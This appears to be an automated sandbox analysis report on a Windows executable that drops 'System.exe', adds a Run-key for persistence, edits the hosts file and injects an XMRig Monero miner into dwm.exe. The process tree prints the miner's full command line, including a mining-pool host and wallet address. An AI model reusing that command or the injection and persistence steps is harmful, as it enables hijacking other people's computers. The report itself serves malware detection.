Analysis
-
max time kernel
123s -
max time network
169s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
21-05-2022 00:39
Static task
static1
Behavioral task
behavioral1
Sample
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe
Resource
win10v2004-20220414-en
General
-
Target
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe
-
Size
19.2MB
-
MD5
19263218df8fc863e249a5300abd8856
-
SHA1
0775d23e9c3aca70961fe1498735c650f441c5df
-
SHA256
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482
-
SHA512
cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9
Malware Config
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs
-
XMRig Miner Payload 11 IoCs
Processes:
resource yara_rule behavioral1/memory/1620-68-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-70-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-72-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-73-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-75-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-76-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-78-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-80-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-81-0x00000000004014F0-mapping.dmp xmrig behavioral1/memory/1620-83-0x0000000000400000-0x0000000000873000-memory.dmp xmrig behavioral1/memory/1620-84-0x0000000000400000-0x0000000000873000-memory.dmp xmrig -
Drops file in Drivers directory 1 IoCs
Processes:
System.exedescription ioc process File opened for modification C:\Windows\System32\Drivers\Etc\Hosts System.exe -
Executes dropped EXE 1 IoCs
Processes:
System.exepid process 588 System.exe -
Loads dropped DLL 1 IoCs
Processes:
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exepid process 1480 5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
System.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows\CurrentVersion\Run\System.exe = "C:\\Users\\Admin\\AppData\\Roaming\\System.exe" System.exe -
Drops file in System32 directory 7 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\system32\wbem\repository svchost.exe File opened for modification C:\Windows\system32\wbem\repository\WRITABLE.TST svchost.exe File opened for modification C:\Windows\system32\wbem\repository\MAPPING1.MAP svchost.exe File opened for modification C:\Windows\system32\wbem\repository\MAPPING2.MAP svchost.exe File opened for modification C:\Windows\system32\wbem\repository\MAPPING3.MAP svchost.exe File opened for modification C:\Windows\system32\wbem\repository\OBJECTS.DATA svchost.exe File opened for modification C:\Windows\system32\wbem\repository\INDEX.BTR svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
System.exedescription pid process target process PID 588 set thread context of 1620 588 System.exe dwm.exe -
Drops file in Windows directory 2 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\Tasks\SCHEDLGU.TXT svchost.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 33 IoCs
Processes:
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exeSystem.exepid process 1480 5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe 588 System.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
svchost.exepid process 1248 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exeSystem.exesvchost.exedescription pid process Token: SeDebugPrivilege 1480 5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe Token: SeDebugPrivilege 588 System.exe Token: SeAssignPrimaryTokenPrivilege 1248 svchost.exe Token: SeIncreaseQuotaPrivilege 1248 svchost.exe Token: SeSecurityPrivilege 1248 svchost.exe Token: SeTakeOwnershipPrivilege 1248 svchost.exe Token: SeLoadDriverPrivilege 1248 svchost.exe Token: SeSystemtimePrivilege 1248 svchost.exe Token: SeBackupPrivilege 1248 svchost.exe Token: SeRestorePrivilege 1248 svchost.exe Token: SeShutdownPrivilege 1248 svchost.exe Token: SeSystemEnvironmentPrivilege 1248 svchost.exe Token: SeUndockPrivilege 1248 svchost.exe Token: SeManageVolumePrivilege 1248 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1248 svchost.exe Token: SeIncreaseQuotaPrivilege 1248 svchost.exe Token: SeSecurityPrivilege 1248 svchost.exe Token: SeTakeOwnershipPrivilege 1248 svchost.exe Token: SeLoadDriverPrivilege 1248 svchost.exe Token: SeSystemtimePrivilege 1248 svchost.exe Token: SeBackupPrivilege 1248 svchost.exe Token: SeRestorePrivilege 1248 svchost.exe Token: SeShutdownPrivilege 1248 svchost.exe Token: SeSystemEnvironmentPrivilege 1248 svchost.exe Token: SeUndockPrivilege 1248 svchost.exe Token: SeManageVolumePrivilege 1248 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1248 svchost.exe Token: SeIncreaseQuotaPrivilege 1248 svchost.exe Token: SeSecurityPrivilege 1248 svchost.exe Token: SeTakeOwnershipPrivilege 1248 svchost.exe Token: SeLoadDriverPrivilege 1248 svchost.exe Token: SeSystemtimePrivilege 1248 svchost.exe Token: SeBackupPrivilege 1248 svchost.exe Token: SeRestorePrivilege 1248 svchost.exe Token: SeShutdownPrivilege 1248 svchost.exe Token: SeSystemEnvironmentPrivilege 1248 svchost.exe Token: SeUndockPrivilege 1248 svchost.exe Token: SeManageVolumePrivilege 1248 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1248 svchost.exe Token: SeIncreaseQuotaPrivilege 1248 svchost.exe Token: SeSecurityPrivilege 1248 svchost.exe Token: SeTakeOwnershipPrivilege 1248 svchost.exe Token: SeLoadDriverPrivilege 1248 svchost.exe Token: SeSystemtimePrivilege 1248 svchost.exe Token: SeBackupPrivilege 1248 svchost.exe Token: SeRestorePrivilege 1248 svchost.exe Token: SeShutdownPrivilege 1248 svchost.exe Token: SeSystemEnvironmentPrivilege 1248 svchost.exe Token: SeUndockPrivilege 1248 svchost.exe Token: SeManageVolumePrivilege 1248 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1248 svchost.exe Token: SeIncreaseQuotaPrivilege 1248 svchost.exe Token: SeSecurityPrivilege 1248 svchost.exe Token: SeTakeOwnershipPrivilege 1248 svchost.exe Token: SeLoadDriverPrivilege 1248 svchost.exe Token: SeSystemtimePrivilege 1248 svchost.exe Token: SeBackupPrivilege 1248 svchost.exe Token: SeRestorePrivilege 1248 svchost.exe Token: SeShutdownPrivilege 1248 svchost.exe Token: SeSystemEnvironmentPrivilege 1248 svchost.exe Token: SeUndockPrivilege 1248 svchost.exe Token: SeManageVolumePrivilege 1248 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1248 svchost.exe Token: SeIncreaseQuotaPrivilege 1248 svchost.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exeSystem.exedescription pid process target process PID 1480 wrote to memory of 588 1480 5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe System.exe PID 1480 wrote to memory of 588 1480 5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe System.exe PID 1480 wrote to memory of 588 1480 5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe System.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe PID 588 wrote to memory of 1620 588 System.exe dwm.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe"C:\Users\Admin\AppData\Local\Temp\5750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\System.exe"C:\Users\Admin\AppData\Roaming\System.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe -B -a cryptonight --donate-level=1 --url=gulf.moneroocean.stream:10001 -u 43NsyECLTgtEFJ3cbXQAHCe7dvuijrjXENAEZWPucGh6GgdHC5eYHHcXNjyvSDeK4QfaXSbg8rQTw1EiCmZnmpuY9d8MxqY -p Admin -k --randomx-mode=light --cpu-priority=0 -t 13⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\System.exeFilesize
19.2MB
MD519263218df8fc863e249a5300abd8856
SHA10775d23e9c3aca70961fe1498735c650f441c5df
SHA2565750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482
SHA512cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9
-
C:\Users\Admin\AppData\Roaming\System.exeFilesize
19.2MB
MD519263218df8fc863e249a5300abd8856
SHA10775d23e9c3aca70961fe1498735c650f441c5df
SHA2565750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482
SHA512cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9
-
\Users\Admin\AppData\Roaming\System.exeFilesize
19.2MB
MD519263218df8fc863e249a5300abd8856
SHA10775d23e9c3aca70961fe1498735c650f441c5df
SHA2565750a4e7e392665b01ccfdd4af273ccbe096b14516c7a3e0f2fbb068ad25e482
SHA512cc793a66cf206bf8e48a55e0c84dfc361d44896b5a69534d27b9376bd7d7be59067a667e5077fbea48f40c7841994c57e1bcdfabe14c42d4a59271a9ea4b44a9
-
memory/588-57-0x0000000000000000-mapping.dmp
-
memory/588-60-0x0000000000370000-0x0000000000378000-memory.dmpFilesize
32KB
-
memory/1480-54-0x0000000000400000-0x0000000001734000-memory.dmpFilesize
19.2MB
-
memory/1480-55-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmpFilesize
8KB
-
memory/1620-70-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-76-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-64-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-66-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-68-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-61-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-72-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-73-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-75-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-62-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-78-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-80-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-81-0x00000000004014F0-mapping.dmp
-
memory/1620-83-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-84-0x0000000000400000-0x0000000000873000-memory.dmpFilesize
4.4MB
-
memory/1620-85-0x00000000001A0000-0x00000000001B0000-memory.dmpFilesize
64KB
-
memory/1620-86-0x0000000000000000-0x0000000000200000-memory.dmpFilesize
2.0MB